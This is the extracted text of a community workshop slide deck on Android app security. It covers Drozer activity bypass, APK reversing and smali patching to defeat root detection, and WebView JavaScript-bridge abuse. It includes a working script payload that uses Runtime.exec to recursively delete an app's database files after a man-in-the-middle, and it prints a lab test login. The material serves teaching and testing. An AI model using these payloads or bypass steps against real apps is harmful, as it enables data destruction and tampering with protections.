WHO AM I

Next Generation problem Solver

Researcher & Reader in free time

Speaker at 

Facilitator at Weekend Testing

Bug bounty Hunter  (eX .Crowd Tester)

Reported Security Vulnerabilities for 50+ unique customers all over the world 

including Apple, yahoo, Outlook, adobe & etc.

Love to develop nasty code  & Hack it :)

Works as Security Researcher  at  

Certified Ethical Hacker  AKA. Bug Wrangler

Null  & OWASP Co mmunity

Accenture Digital Mobility

DISCLAIMER

This Presentation is intended for educational purposes only and I cannot be held liable for

any kind of damages done whatsoever to your machine, or other damages.  Please - Don't try this attack on any others system without having context knowledge or

permission, this may harm to someone directly or indirectly.

Feel free to use this presentation for practice or education purpose.

It's no way related to my employer - its my own research and  ideas. 

^ I hope - You gotcha ^

 HUMLA

MEANS 'ATTACK' IN HINDI

                        

 

SOCIAL MEDIA FEEDHashtag for this session

     #NullHumla,  #MobileSecurity

: Twitter handle for feedback :

 @ @ null0x00   Abhinav_Sejpal

???

~ WE AREN'T GOING TO DO THIS ~

So, feel free to stop when you have a doubt!

 Are you Ready to Rock

Android Smartphone to IOT

The Mobile market is fragmented, stakeholders want theirbetter cheaper faster mobile app - Correct? 

What is if it's has Vulnerable code? WOW :D 

 - Yet to update the stats - 

ANDROID PACKAGE - APK

DEVELOPMENT PLAN

ANDROID ARCHITECTURE 

MY HOME IS YOUR APK 

 

OUR ARSENAL

PREREQUISITES CHECKS

Genymotion Emulator Santoku Linux /  Appie / Android Tamer  Copy of Shared APK(s) : Here

DROZER FRAMEWORK INTRODUCTION

Drozer Server Drozer Agent 

BYPASS THE ACTIVITY VALIDATION

       run app.activity.start --component sh.whisper

sh.whisper.WInboxActivity  

Self-Practice Session  

Challenge 1 – Bypass the fix authorization for the whisperApp 

nulltest2015@yahoo.in - Password!

 ADHOC  FORENSIC ANALYSIS 

Can we replicate this issue for the LinkedIn / Hike App ?

Linkedin Insecure data stroage

INSTALL THE BANK APP  Oh No - I can't use the App due to rooted device  :(

  Smali code Analysis 

Step 1.  Reversing the APK to the JAR File (JavA file)

dex2jar-2.0/ d2j-dex2jar.sh bank.apk

STEP 2  READ JAR USING JD-GUI

jd-gui bank-dex2jar.jar

STEP 3Reversing the apk to the smali code

java -jar apktool_2.0.0.jar d bank.apk

4. LOCATE THE CODE WHICH DETECTS THEROOT 

5. LOCATE SAME LOGIC IN JAR 

STEP 6. PREPARE LOGICAL PATCH

We can't patch the Java code and get the binary 

- We have to patch the smali code with new logic of  isRooted 

7. NEW LOGIC IS AVAILABLE IN SMALI

8. FIX THE SMALI CODE 

9. Rebuild the binary 

10. CREATE SELF-SIGNEDCERTIFICATE 

http://developer.android.com/tools/publishing/app-signing.html

11. SIGN APK WITH JAR SIGNER   

12. CHECK -  ROOT DETECTION

* Updated apk has patched code *

~  SUMMARY ~  

Demo on Missing Root Detection - Done  Demo on Reversing the APK  -  DoneDemo on rebuild the APK - Done  Demo on weak Binary - Done 

Fix : Use the Dex Guard not the pro guard   Update the logical validation  - Done  Identify attack surface at Smali code - Done  Demo on Patch the Smali code - Done  Demo on APK signing - Done  Finally done the root detection bypass - Done 

ANDROID WEB-VIEW Android allows apps to create a bridge in order to render

HTML , javascript code  and allow interacting with the javacodes of the application using   WebKit open source web

browser engine

70 % of applications use WebViews  

THERE IS TWEAK WITH USAGE DISABLE SUPPORT FOR JAVASCRIPT DISABLE SUPPORT FOR PLUGINS DISABLE FILE SYSTEM ACCESS

 

WELL - HTTP VS HTTPS

  WEBVIEW = NEW WEBVIEW(THIS); 

WEBVIEW.GETSETTINGS().SETJAVASCRIPTENABLED(FALSE); 

IDENTIFY THE APP WITH THE WEBKIT

- Reverse the binary -Find the webview  code  with  addJavascriptinterface

 enabled - Remember it's smali code - 

    IDENTIFY AND UNDERSTAND THE ACTIVITY WITH JAVASCRIPT ENABLE AT CLEAN JAVA CODE

 

VERIFY NETWORK IS MALICIOUS ?

HTTP VS  Vulnerable HTTPS VS  HTTPS  

Edit  the Response from cloud server   (Man In middle)

MALICIOUS JS VECTOR <script>

var path = ' /data/data/com.box.android/databases/---';

function execute(cmd){

document.write("WebView Vulnerability");

return window.Android.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);

 }

execute([' /system/bin/rm', '-R', path]); 

</script>

BOOM - COMMAND HAS EXECUTED SUCCESSFULLY 

BYPASS THE ACTIVITY +

API ATTACKS WITH VK APP

YES - I'M DONE!

Feel free to write me at bug.wrangler at outlook.com

Or 

Tweet me at Abhinav_Sejpal

We need you!

Attend Null Meets-up & give presentations. Share your ideas & leanings. Talk to our community champions. Your feedback helps us to build a good community. Looking forward for your ongoing support.

 http://null.co.in/

Say 'Hello' @null0x00

! THANK YOU ! 

@anantshri  @oldmanlab  @adi1391 @prateekg147@5h1vang @exploitprotocol

 #Nullblr Leads & Champions

Big thank you to @null0x00, Satish, Apoorva & you All

LICENSE AND COPYRIGHTS

copyrights 2015-2016  https://slides.com/abhinavsejpal/bangalore-android-null-

humla/  Abhinav Sejpal

-----

  ( CC BY-NC-ND 3.0)

Attribution-NonCommercial-NoDerivs 3.0 Unported

  Dedicated to my lovely daddy